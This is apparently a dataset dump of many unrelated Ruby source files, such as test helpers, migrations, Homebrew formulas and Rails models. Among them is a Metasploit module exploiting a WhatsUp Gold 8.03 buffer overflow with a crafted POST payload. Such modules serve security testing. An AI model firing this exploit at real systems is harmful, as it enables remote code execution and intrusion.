class << self
def configure(config)
config.filter_run_excluding :requires => method(:filter).to_proc
config.before { Capybara::SpecHelper.reset! }
config.after { Capybara::SpecHelper.reset! }
# Test in 3.5+ where metadata doesn't autotrigger shared context inclusion - will be only behavior in RSpec 4
config.shared_context_metadata_behavior = :apply_to_host_groups if RSpec::Core::Version::STRING.to_f >= 3.5
end
def reset!
Capybara.app = TestApp
Capybara.app_host = nil
Capybara.default_selector = :xpath
Capybara.default_max_wait_time = 1
Capybara.ignore_hidden_elements = true
Capybara.exact = false
Capybara.exact_options = false
Capybara.raise_server_errors = true
Capybara.visible_text_only = false
Capybara.match = :smart
Capybara.wait_on_first_by_default = false
Capybara.enable_aria_label = false
end
def filter(requires, metadata)
if requires and metadata[:capybara_skip]
requires.any? do |require|
metadata[:capybara_skip].include?(require)
end
else
false
end
end
def spec(name, options={}, &block)
@specs ||= []
@specs << [name, options, block]
end
def run_specs(session, name, options={})
specs = @specs
RSpec.describe Capybara::Session, name, options do
include Capybara::SpecHelper
include Capybara::RSpecMatchers
before do
@session = session
end
after do
@session.reset_session!
end
specs.each do |spec_name, spec_options, block|
describe spec_name, spec_options do
class_eval(&block)
end
end
end
end
end # class << self
def silence_stream(stream)
old_stream = stream.dup
stream.reopen(RbConfig::CONFIG['host_os'] =~ /rmswin|mingw/ ? 'NUL:' : '/dev/null')
stream.sync = true
yield
ensure
stream.reopen(old_stream)
end
def quietly
silence_stream(STDOUT) do
silence_stream(STDERR) do
yield
end
end
end
def extract_results(session)
expect(session).to have_xpath("//pre[@id='results']")
YAML.load Nokogiri::HTML(session.body).xpath("//pre[@id='results']").first.inner_html.lstrip
end
end
end
Dir[File.dirname(__FILE__) + "/session/**/*.rb"].each { |file| require_relative file }
| 29.923077 | 117 | 0.638175 |
6257ba5b73de54af121a5e4d4b7a55a70501dd65 | 6,727 | require 'sequel_postgresql_triggers'
Sequel.migration do
up do
extension :pg_triggers
create_table(:std_fruit_size_counts, ignore_index_errors: true) do
primary_key :id
foreign_key :commodity_id, :commodities, null: false
foreign_key :uom_id, :uoms, null: false
String :size_count_description
String :marketing_size_range_mm
String :marketing_weight_range
String :size_count_interval_group
Integer :size_count_value, null: false
Integer :minimum_size_mm
Integer :maximum_size_mm
Integer :average_size_mm
Float :minimum_weight_gm
Float :maximum_weight_gm
Float :average_weight_gm
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique [:commodity_id, :size_count_value]
index [:commodity_id], name: :fki_std_fruit_size_counts_commodities
end
pgt_created_at(:std_fruit_size_counts,
:created_at,
function_name: :pgt_std_fruit_size_counts_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:std_fruit_size_counts,
:updated_at,
function_name: :pgt_std_fruit_size_counts_set_updated_at,
trigger_name: :set_updated_at)
create_table(:basic_pack_codes, ignore_index_errors: true) do
primary_key :id
String :basic_pack_code, null: false
String :description
Integer :length_mm
Integer :width_mm
Integer :height_mm
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique :basic_pack_code, name: :basic_pack_codes_unique_code
end
pgt_created_at(:basic_pack_codes,
:created_at,
function_name: :pgt_basic_pack_codes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:basic_pack_codes,
:updated_at,
function_name: :pgt_basic_pack_codes_set_updated_at,
trigger_name: :set_updated_at)
create_table(:standard_pack_codes, ignore_index_errors: true) do
primary_key :id
foreign_key :basic_pack_code_id, :basic_pack_codes
String :standard_pack_code, null: false
String :description
String :std_pack_label_code
BigDecimal :material_mass, null: false
TrueClass :use_size_ref_for_edi, default: false
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique :standard_pack_code, name: :standard_pack_codes_unique_code
end
pgt_created_at(:standard_pack_codes,
:created_at,
function_name: :pgt_standard_pack_codes_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:standard_pack_codes,
:updated_at,
function_name: :pgt_standard_pack_codes_set_updated_at,
trigger_name: :set_updated_at)
create_table(:fruit_actual_counts_for_packs, ignore_index_errors: true) do
primary_key :id
foreign_key :std_fruit_size_count_id, :std_fruit_size_counts, null: false
foreign_key :basic_pack_code_id, :basic_pack_codes, null: false
column :standard_pack_code_ids, 'integer[]'
column :size_reference_ids, 'integer[]'
Integer :actual_count_for_pack, null: false
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique [:std_fruit_size_count_id, :basic_pack_code_id], name: :fruit_actual_counts_for_packs_idx
index [:std_fruit_size_count_id], name: :fki_fruit_actual_counts_for_packs_std_fruit_size_counts
index [:basic_pack_code_id], name: :fki_fruit_actual_counts_for_packs_basic_pack_codes
index [:standard_pack_code_id], name: :fki_fruit_actual_counts_for_packs_standard_pack_codes
end
pgt_created_at(:fruit_actual_counts_for_packs,
:created_at,
function_name: :pgt_fruit_actual_counts_for_packs_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:fruit_actual_counts_for_packs,
:updated_at,
function_name: :pgt_fruit_actual_counts_for_packs_set_updated_at,
trigger_name: :set_updated_at)
create_table(:fruit_size_references, ignore_index_errors: true) do
primary_key :id
foreign_key :fruit_actual_counts_for_pack_id, :fruit_actual_counts_for_packs, null: false
String :size_reference, null: false
String :edi_out_code
TrueClass :active, default: true
DateTime :created_at, null: false
DateTime :updated_at, null: false
unique [:size_reference], name: :fruit_size_references_idx
end
pgt_created_at(:fruit_size_references,
:created_at,
function_name: :pgt_fruit_size_references_set_created_at,
trigger_name: :set_created_at)
pgt_updated_at(:fruit_size_references,
:updated_at,
function_name: :pgt_fruit_size_references_set_updated_at,
trigger_name: :set_updated_at)
end
down do
drop_trigger(:fruit_size_references, :set_created_at)
drop_function(:pgt_fruit_size_references_set_created_at)
drop_trigger(:fruit_size_references, :set_updated_at)
drop_function(:pgt_fruit_size_references_set_updated_at)
drop_table(:fruit_size_references)
drop_trigger(:fruit_actual_counts_for_packs, :set_created_at)
drop_function(:pgt_fruit_actual_counts_for_packs_set_created_at)
drop_trigger(:fruit_actual_counts_for_packs, :set_updated_at)
drop_function(:pgt_fruit_actual_counts_for_packs_set_updated_at)
drop_table(:fruit_actual_counts_for_packs)
drop_trigger(:standard_pack_codes, :set_created_at)
drop_function(:pgt_standard_pack_codes_set_created_at)
drop_trigger(:standard_pack_codes, :set_updated_at)
drop_function(:pgt_standard_pack_codes_set_updated_at)
drop_table(:standard_pack_codes)
drop_trigger(:basic_pack_codes, :set_created_at)
drop_function(:pgt_basic_pack_codes_set_created_at)
drop_trigger(:basic_pack_codes, :set_updated_at)
drop_function(:pgt_basic_pack_codes_set_updated_at)
drop_table(:basic_pack_codes)
drop_trigger(:std_fruit_size_counts, :set_created_at)
drop_function(:pgt_std_fruit_size_counts_set_created_at)
drop_trigger(:std_fruit_size_counts, :set_updated_at)
drop_function(:pgt_std_fruit_size_counts_set_updated_at)
drop_table(:std_fruit_size_counts)
end
end
| 42.04375 | 102 | 0.718894 |
382187dac186c8faf44c0ddbda0b707a9177dd70 | 1,016 | class Shellharden < Formula
desc "Bash syntax highlighter that encourages/fixes variables quoting"
homepage "https://github.com/anordal/shellharden"
url "https://github.com/anordal/shellharden/archive/v4.1.tar.gz"
sha256 "2714b827f72c336b7abf87f5a291ec182443a5479ec3eee516d6e04c81d56414"
bottle do
sha256 "23a4338547c6cb9b3e4e8d454cb8e1420c5a38f0440b9dde0f95384656ef87ca" => :mojave
sha256 "1dc1515f934b43e17b4faeb17cda61a22a28866e625d863c7372eda6a2e111d3" => :high_sierra
sha256 "2fdb7e3d8fdeab4089143e5d11f1b5b379f25b11623af5497cd54e829ccd1b85" => :sierra
sha256 "d1b2430ab2de01134b5a0b4435fb7280bed7f140e662d7e2ccd4764a5be6e737" => :el_capitan
end
depends_on "rust" => :build
def install
system "cargo", "install", "--root", prefix, "--path", "."
end
test do
(testpath/"script.sh").write <<~EOS
dog="poodle"
echo $dog
EOS
system bin/"shellharden", "--replace", "script.sh"
assert_match "echo \"$dog\"", (testpath/"script.sh").read
end
end
| 35.034483 | 93 | 0.748031 |
03695441cf86f3d29b83458a3f2be4fb8e292422 | 735 | src_filename = ::File.basename(node['nginx']['openssl_source']['url'])
src_filepath = "#{Chef::Config['file_cache_path']}/#{src_filename}"
extract_path = "#{Chef::Config['file_cache_path']}/openssl-#{node['nginx']['openssl_source']['version']}"
remote_file src_filepath do
source node['nginx']['openssl_source']['url']
not_if { ::File.exist?(src_filepath) }
end
bash 'extract_openssl' do
cwd ::File.dirname(src_filepath)
code <<-EOH
mkdir -p #{extract_path}
tar xzf #{src_filename} -C #{extract_path}
mv #{extract_path}/*/* #{extract_path}/
EOH
not_if { ::File.exist?(extract_path) }
end
node.run_state['nginx_configure_flags'] = node.run_state['nginx_configure_flags'] | ["--with-openssl=#{extract_path}"]
| 35 | 118 | 0.697959 |
08c02bc2d9549cf84e77c51eda8dd8af9d7ddf4a | 556 | module Sip2
module Responses
#
# Sip2 Patron Information
#
class PatronInformation < BaseResponse
register_response_code 64
def patron_valid?
boolean 'BL'
end
def authenticated?
boolean 'CQ'
end
def email
text 'BE'
end
def location
text 'AQ'
end
def screen_message
text 'AF'
end
private
def attributes_for_inspect
%i[patron_valid? authenticated? email location screen_message]
end
end
end
end
| 15.027027 | 70 | 0.573741 |
e265b0ff54f2735e22041afb418d5433ef961309 | 1,138 | require 'waffle_api/errors'
require 'net/http'
require 'openssl'
require 'json'
require 'uri'
module WaffleAPI
# List of helpers used in WaffleAPI
module Helpers
NOT_FOUND_ERROR = 'Invalid BTC Address!'
INVALIDATION_TIME = 30 # Seconds
def call_uri
URI "#{WAFFLEPOOL_URL}#{WAFFLEPOOL_API_PATH}?address=#{@address}"
end
def request_json
response = Net::HTTP.get_response call_uri
fail Error::EndPointMoved if response.is_a? Net::HTTPNotFound
json = JSON.parse response.body
fail Error::AddressNotFound, @address if json['error'] == NOT_FOUND_ERROR
fail Error::UnknownError, json['error'] unless json['error'].empty?
json.delete 'error'
json
end
def data_recent?
@retrieved_at && @retrieved_at > Time.now - INVALIDATION_TIME
end
def data_recent!
@retrieved_at = Time.now
end
def stats(key, force_update = false)
@datas ||= []
if !data_recent? || force_update
@datas = request_json
data_recent!
end
fail Error::UnknownKey, key if @datas[key].nil?
@datas[key]
end
end
end
| 22.76 | 79 | 0.656415 |
5dca89cd47c12a8c251202c756996b52122a00a9 | 961 | require 'csv'
module SphyGmo
ErrorInfo = Struct.new('ErrorInfo', :code, :info, :message) do |s|
class << s
attr_accessor :all
def parse(v)
v = v.send(:error_info) if v.respond_to?(:error_info)
infos = case v
when Hash
v['ErrInfo'].split('|')
when String
[v]
when Array
v
else
raise ArgumentError.new("#{self} cannot parse #{v.inspect}")
end
infos.map{|code| self[code]}
end
def [](code)
all.fetch(code)
end
def all
@all ||= init_all
end
private
def init_all
all = {}
CSV
.foreach(SphyGmo.path_to_resources 'assets/gmo_error_codes.csv')
.map{|row| ErrorInfo.new(*row).freeze }
.each{|err| all[err.info] = err }
all.freeze
end
end
end
end
| 21.840909 | 78 | 0.471384 |
915c5b517840b414eb1063cac24cbce577dfbc81 | 336 | class Store < ActiveRecord::Base
before_save(:fix)
has_many :brands_stores # points to join table
has_many :brands, through: :brands_stores # links
validates(:name, {:uniqueness => true, :presence => true, :length => { :maximum => 100 }})
private
def fix
self.name=self.name.capitalize
end
end
| 22.4 | 92 | 0.645833 |
f7a687f4739292a69fad3a7c85cd798684d148a3 | 1,973 | module ActiveRecord
module Reflection
class AssociationReflection #:nodoc:
def reverse_for?(klass)
reverse_matches_for(klass).empty? ? false : true
end
attr_writer :reverse
def reverse
if @reverse.nil? and not self.options[:polymorphic]
reverse_matches = reverse_matches_for(self.class_name.constantize) rescue nil
# grab first association, or make a wild guess
@reverse = reverse_matches.blank? ? false : reverse_matches.first.name
end
@reverse
end
protected
def reverse_matches_for(klass)
reverse_matches = []
# stage 1 filter: collect associations that point back to this model and use the same primary_key_name
klass.reflect_on_all_associations.each do |assoc|
# skip over has_many :through associations
next if assoc.options[:through]
next unless assoc.options[:polymorphic] or assoc.class_name.constantize == self.active_record
case [assoc.macro, self.macro].find_all{|m| m == :has_and_belongs_to_many}.length
# if both are a habtm, then match them based on the join table
when 2
next unless assoc.options[:join_table] == self.options[:join_table]
# if only one is a habtm, they do not match
when 1
next
# otherwise, match them based on the primary_key_name
when 0
next unless assoc.primary_key_name.to_sym == self.primary_key_name.to_sym
end
reverse_matches << assoc
end
# stage 2 filter: name-based matching (association name vs self.active_record.to_s)
reverse_matches.find_all do |assoc|
self.active_record.to_s.underscore.include? assoc.name.to_s.pluralize.singularize
end if reverse_matches.length > 1
reverse_matches
end
end
end
end
| 34.614035 | 112 | 0.633046 |
e94c1343904b07ebe3a2aa62f5be8606f8338deb | 9,487 | require 'test_helper'
module Synapse
module UnitOfWork
class UnitOfWorkTest < Test::Unit::TestCase
def setup
@provider = UnitOfWorkProvider.new
@uow = UnitOfWork.new @provider
end
def teardown
if @provider.started?
raise 'Unit of work was not properly cleared from the provider'
end
end
should 'raise an exception if the unit is started twice' do
@uow.start
assert_raises RuntimeError do
@uow.start
end
@uow.rollback
end
should 'raise an exception if a commit is requested but the unit is not started' do
assert_raises RuntimeError do
@uow.commit
end
end
should 'keep an identity map for aggregates of the same type and identifier' do
aggregate_a = TestAggregateA.new 1
aggregate_b = TestAggregateB.new 2
aggregate_c = TestAggregateB.new 3
aggregate_d = TestAggregateB.new 3
event_bus = Object.new
storage_callback = lambda {}
assert_same aggregate_a, @uow.register_aggregate(aggregate_a, event_bus, &storage_callback)
assert_same aggregate_b, @uow.register_aggregate(aggregate_b, event_bus, &storage_callback)
assert_same aggregate_c, @uow.register_aggregate(aggregate_c, event_bus, &storage_callback)
assert_same aggregate_c, @uow.register_aggregate(aggregate_d, event_bus, &storage_callback)
end
should 'interact with a transaction manager on commit' do
listener = UnitOfWorkListener.new
tx = Object.new
txm = Object.new
mock(txm).start {
tx
}
mock(listener).on_start(@uow).ordered
mock(listener).on_prepare_commit(@uow, anything, anything).ordered
mock(listener).on_prepare_transaction_commit(@uow, tx).ordered
mock(txm).commit(tx).ordered
mock(listener).after_commit(@uow).ordered
mock(listener).on_cleanup(@uow).ordered
@uow.transaction_manager = txm
@uow.register_listener listener
@uow.start
@uow.commit
end
should 'interact with a transaction manager on rollback' do
listener = UnitOfWorkListener.new
tx = Object.new
txm = Object.new
mock(txm).start {
tx
}
mock(listener).on_start(@uow).ordered
mock(txm).rollback(tx).ordered
mock(listener).on_rollback(@uow, nil).ordered
mock(listener).on_cleanup(@uow).ordered
@uow.transaction_manager = txm
@uow.register_listener listener
@uow.start
@uow.rollback
end
should 'register a listener with the current unit of work if it is unaware of nesting' do
outer_unit = Object.new
mock(outer_unit).register_listener(is_a(OuterCommitUnitOfWorkListener))
mock(outer_unit).rollback
@provider.push outer_unit
inner_unit = create_uow
inner_unit.rollback
outer_unit.rollback
@provider.clear outer_unit
end
should 'roll back inner units if the outer unit is rolled back' do
outer_unit = create_uow
inner_unit = create_uow
listener = UnitOfWorkListener.new
mock(listener).on_rollback(inner_unit, nil)
inner_unit.register_listener listener
inner_unit.commit
outer_unit.rollback
end
should 'commit inner units after the outer unit is committed' do
outer_unit = create_uow
inner_unit = create_uow
committed = false
listener = UnitOfWorkListener.new
mock(listener).after_commit(inner_unit) {
committed = true
}
inner_unit.register_listener listener
inner_unit.commit
refute committed, 'Inner unit was committed prematurely'
outer_unit.commit
assert committed, 'Inner unit should have been committed'
end
should 'rollback if a listener raises an exception while preparing to commit' do
cause = TestError.new
listener = UnitOfWorkListener.new
mock(listener).on_prepare_commit(@uow, anything, anything) {
raise cause
}
mock(listener).on_rollback(@uow, cause)
mock(listener).after_commit.never
mock(listener).on_cleanup(@uow)
@uow.register_listener listener
@uow.start
assert_raises TestError do
@uow.commit
end
end
should 'rollback if an aggregate storage callback raises an exception' do
aggregate_root = Object.new
stub(aggregate_root).add_registration_listener
stub(aggregate_root).id
event_bus = Object.new
cause = TestError.new
listener = UnitOfWorkListener.new
mock(listener).on_prepare_commit(@uow, anything, anything)
mock(listener).on_rollback(@uow, cause)
mock(listener).after_commit.never
mock(listener).on_cleanup(@uow)
@uow.start
@uow.register_listener listener
@uow.register_aggregate aggregate_root, event_bus do |aggregate|
raise cause
end
assert_raises TestError do
@uow.commit
end
end
should 'rollback if the event bus raises an exception when publishing events' do
cause = TestError.new
event = Object.new
event_bus = Object.new
mock(event_bus).publish([event]) {
raise cause
}
listener = UnitOfWorkListener.new
mock(listener).on_event_registered(@uow, event) {
event
}
mock(listener).after_commit.never
@uow.start
@uow.register_listener listener
@uow.publish_event event, event_bus
assert_raises TestError do
@uow.commit
end
end
should 'delay cleanup of inner unit after commit until outer unit is committed' do
outer_listener = UnitOfWorkListener.new
inner_listener = UnitOfWorkListener.new
outer_unit = create_uow
inner_unit = create_uow
outer_unit.register_listener outer_listener
inner_unit.register_listener inner_listener
mock(inner_listener).after_commit(inner_unit).ordered
mock(outer_listener).after_commit(outer_unit).ordered
mock(inner_listener).on_cleanup(inner_unit).ordered
mock(outer_listener).on_cleanup(outer_unit).ordered
inner_unit.commit
outer_unit.commit
end
should 'delay cleanup of inner unit after rollback until outer unit is committed' do
outer_listener = UnitOfWorkListener.new
inner_listener = UnitOfWorkListener.new
outer_unit = create_uow
inner_unit = create_uow
outer_unit.register_listener outer_listener
inner_unit.register_listener inner_listener
mock(inner_listener).on_rollback(inner_unit, nil).ordered
mock(outer_listener).after_commit(outer_unit).ordered
mock(inner_listener).on_cleanup(inner_unit).ordered
mock(outer_listener).on_cleanup(outer_unit).ordered
inner_unit.rollback
outer_unit.commit
end
should 'delay cleanup of inner unit after commit until outer unit is rolled back' do
outer_listener = UnitOfWorkListener.new
inner_listener = UnitOfWorkListener.new
outer_unit = create_uow
inner_unit = create_uow
outer_unit.register_listener outer_listener
inner_unit.register_listener inner_listener
mock(inner_listener).on_prepare_commit(inner_unit, anything, anything).ordered
mock(inner_listener).on_rollback(inner_unit, nil).ordered
mock(outer_listener).on_rollback(outer_unit, nil).ordered
mock(inner_listener).on_cleanup(inner_unit).ordered
mock(outer_listener).on_cleanup(outer_unit).ordered
inner_unit.commit
outer_unit.rollback
end
should 'raise an exception if a transaction manager is set after the unit has been started' do
@uow.start
assert_raises RuntimeError do
@uow.transaction_manager = Object.new
end
@uow.commit
end
should 'not put the unit of work provider into a bad state if the unit of work fails during start' do
txm = Object.new
mock(txm).start {
raise 'Something bad happened'
}
@uow.transaction_manager = txm
begin
@uow.start
rescue RuntimeError; end
refute @provider.started?
end
should 'continually publish events as events are published' do
@uow.start
event_bus = EventBus::SimpleEventBus.new
event_a = Domain::EventMessage.build
event_b = Domain::EventMessage.build
listener = Object.new
mock(listener).notify(event_a) {
@uow.publish_event event_b, event_bus
}
mock(listener).notify(event_b)
event_bus.subscribe listener
@uow.publish_event event_a, event_bus
@uow.commit
end
private
def create_uow
uow = UnitOfWork.new @provider
uow.start
uow
end
end
class TestError < StandardError; end
class TestAggregateA
include Domain::AggregateRoot
def initialize(id)
@id = id
end
end
class TestAggregateB
include Domain::AggregateRoot
def initialize(id)
@id = id
end
end
end
end
| 28.151335 | 107 | 0.651523 |
9113bb30ce287b8ed534b055c438689da8ad052f | 770 | class User < ApplicationRecord
has_many :instruments, inverse_of: :user, dependent: :destroy
has_many :songs, inverse_of: :user, dependent: :destroy
has_many :elements, through: :songs, inverse_of: :user, dependent: :destroy
validates :email, :username, :password, :password_confirmation, presence: true
validates :email, :username, uniqueness: { case_sensitive: false }
has_secure_password
def self.find_or_create_from_auth_hash(auth)
where(provider: auth.provider, uid: auth.uid).first_or_create do |user|
user.provider = auth.provider
user.uid = auth.uid
user.email = auth.info.email
user.username = auth.info.name
user.password = SecureRandom.hex
user.password_confirmation = user.password
user.save
end
end
end
| 32.083333 | 80 | 0.74026 |
26f80cff3fcc0b45e9f313544f0cdc9a590dd8ab | 587 | require 'ddtrace/contrib/cucumber/formatter'
module Datadog
module Contrib
module Cucumber
# Instrumentation for Cucumber
module Instrumentation
def self.included(base)
base.send(:prepend, InstanceMethods)
end
# Instance methods for configuration
module InstanceMethods
attr_reader :datadog_formatter
def formatters
@datadog_formatter ||= Datadog::Contrib::Cucumber::Formatter.new(@configuration)
[@datadog_formatter] + super
end
end
end
end
end
end
| 23.48 | 92 | 0.637138 |
ab787c67be6f9714b6cba248f455f35fdf687c83 | 2,659 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" )
HttpFingerprint = { :pattern => [ /WhatsUp/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
posting a long string for the value of 'instancename' in the _maincfgret.cgi
script an attacker can overflow a buffer and execute arbitrary code on the system.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2004-0798'],
['OSVDB', '9177'],
['BID', '11043'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => '2004-08-25'))
register_options(
[
OptString.new('HTTPUSER', [ true, 'The username to authenticate as', 'admin']),
OptString.new('HTTPPASS', [ true, 'The password to authenticate as', 'admin']),
])
end
def exploit
c = connect
num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
req = "page=notify&origname=&action=return&type=Beeper&instancename="
req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
print_status("Trying target %s..." % target.name)
res = send_request_cgi({
'uri' => '/_maincfgret.cgi',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'data' => req,
'headers' =>
{
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
}
}, 5)
handler
end
end
| 32.426829 | 99 | 0.547574 |
4ae42ff1db6d9a04e52aa4f1a1feadab35e71ab9 | 1,209 | class Ftjam < Formula
desc "Build tool that can be used as a replacement for Make"
homepage "https://www.freetype.org/jam/"
url "https://downloads.sourceforge.net/project/freetype/ftjam/2.5.2/ftjam-2.5.2.tar.bz2"
sha256 "e89773500a92912de918e9febffabe4b6bce79d69af194435f4e032b8a6d66a3"
bottle do
cellar :any_skip_relocation
sha256 "f94287203827dea6ac5031e695c217a48b1b69e939dcd68a489c8477b4100447" => :el_capitan
sha256 "95490ead99e537713d8c26d1c1bea72b31ea06153a405867ffe83c044593caa0" => :yosemite
sha256 "554e527a1e52be6ebd9f5f1fbae4e8f648f750a179936e329238dee32b32520a" => :mavericks
end
conflicts_with "jam", because: "both install a `jam` binary"
def install
system "./configure", "--prefix=#{prefix}"
system "make"
system "make", "install"
end
test do
(testpath/"Jamfile").write <<-EOS.undent
Main ftjamtest : ftjamtest.c ;
EOS
(testpath/"ftjamtest.c").write <<-EOS.undent
#include <stdio.h>
int main(void)
{
printf("FtJam Test\\n");
return 0;
}
EOS
assert_match "Cc ftjamtest.o", shell_output(bin/"jam")
assert_equal "FtJam Test\n", shell_output("./ftjamtest")
end
end
| 29.487805 | 92 | 0.703888 |
f8276d9dcc656217fdef8d197383b8c2b56ef50e | 1,396 | # frozen_string_literal: true
DiscourseEvent.on(:site_setting_changed) do |name, old_value, new_value|
# Enabling `must_approve_users` on an existing site is odd, so we assume that the
# existing users are approved.
if name == :must_approve_users && new_value == true
User.where(approved: false).update_all(approved: true)
end
if name == :emoji_set
Emoji.clear_cache
before = "/images/emoji/#{old_value}/"
after = "/images/emoji/#{new_value}/"
Scheduler::Defer.later("Fix Emoji Links") do
DB.exec("UPDATE posts SET cooked = REPLACE(cooked, :before, :after) WHERE cooked LIKE :like",
before: before,
after: after,
like: "%#{before}%"
)
end
end
Report.clear_cache(:storage_stats) if [:backup_location, :s3_backup_bucket].include?(name)
if name == :slug_generation_method
Scheduler::Defer.later("Null topic slug") do
Topic.update_all(slug: nil)
end
end
Jobs.enqueue(:update_s3_inventory) if [:enable_s3_inventory, :s3_upload_bucket].include?(name)
Jobs.enqueue(:update_private_uploads_acl) if name == :prevent_anons_from_downloading_files
SvgSprite.expire_cache if name.to_s.include?("_icon")
if SiteIconManager::WATCHED_SETTINGS.include?(name)
SiteIconManager.ensure_optimized!
end
if SiteSetting::WATCHED_SETTINGS.include?(name)
SiteSetting.reset_cached_settings!
end
end
| 29.702128 | 99 | 0.716332 |
bbd66907252c5adbcf1fd3a1f73d81e89f82416c | 687 | cask "banktivity" do
version "8.7.7"
sha256 "63c3c30da83d4f4f131686d7d4f23975e0afb531e8a029256ae4aa551795b49f"
url "https://www.iggsoft.com/banktivity/Banktivity#{version}.dmg",
verified: "iggsoft.com/"
name "Banktivity"
desc "App to manage bank accounts in one place"
homepage "https://www.iggsoftware.com/banktivity/"
livecheck do
url "https://www.iggsoft.com/banktivity/banktivity-versions-feed.json"
regex(/"version"\s*:\s*"(\d+(?:\.\d+)+)"/i)
end
depends_on macos: ">= :catalina"
app "Banktivity.app"
zap trash: [
"~/Library/Application Scripts/com.iggsoftware.banktivity",
"~/Library/Containers/com.iggsoftware.banktivity",
]
end
| 27.48 | 75 | 0.704512 |
1ac1529b96c3bfc1b4e24b0845d0a8511a2f1daa | 271 | package 'explicit_action' do
action :lock
end
package 'with_attributes' do
version '1.0.0'
action :lock
end
package 'specifying the identity attribute' do
package_name 'identity_attribute'
action :lock
end
package %w(with array) do
action :lock
end
| 15.055556 | 46 | 0.730627 |
26456611b9bee589228d9e37eac66ece7daae718 | 55 | json.array! @duties, partial: 'duties/duty', as: :duty
| 27.5 | 54 | 0.690909 |
875195cd525598e96045957370238a81634f0e53 | 543 | namespace :env do
desc 'Ensure every non optional ENV variable is defined.'
task :lint => :load do
formatter = EnvLint::Formatter.new
begin
EnvLint.verify_hash(env_definition_file, ENV)
formatter.ok('env looks ok')
rescue EnvLint::MissingVariables => e
formatter.missing_variables(e.dot_env_file, e.missing_variables)
abort
rescue EnvLint::Error => e
formatter.error(e.message)
end
end
task :load do
end
def env_definition_file
ENV['DEFINITION'] || '.env.example'
end
end
| 22.625 | 70 | 0.683241 |
6a29562142dc98918b64b14edbde96e16ac98cba | 296 | module DmUniboCommon
class PermissionPolicy < ApplicationPolicy
def index?
@user.is_cesia?
end
def show?
@user.is_cesia?
end
# only superuser
def create?
@user.is_cesia?
end
# only superuser
def update?
create?
end
def destroy?
update?
end
end
end
| 11.384615 | 42 | 0.658784 |
f756592f448fad84fad2215cd5df5b40d2ff0dc6 | 103 | class ApplicationMailer < ActionMailer::Base
default from: '[email protected]'
layout 'mailer'
end
| 17.166667 | 44 | 0.757282 |
e236dff908296ebfd81d207abb7f2adc08a34120 | 1,202 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Subscriptions::Mgmt::V2019_10_01_preview
module Models
#
# The ID of the subscriptions that is being renamed
#
class RenamedSubscriptionId
include MsRestAzure
# @return [String] The ID of the subscriptions that is being renamed
attr_accessor :value
#
# Mapper for RenamedSubscriptionId class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RenamedSubscriptionId',
type: {
name: 'Composite',
class_name: 'RenamedSubscriptionId',
model_properties: {
value: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'value',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 25.574468 | 74 | 0.5599 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.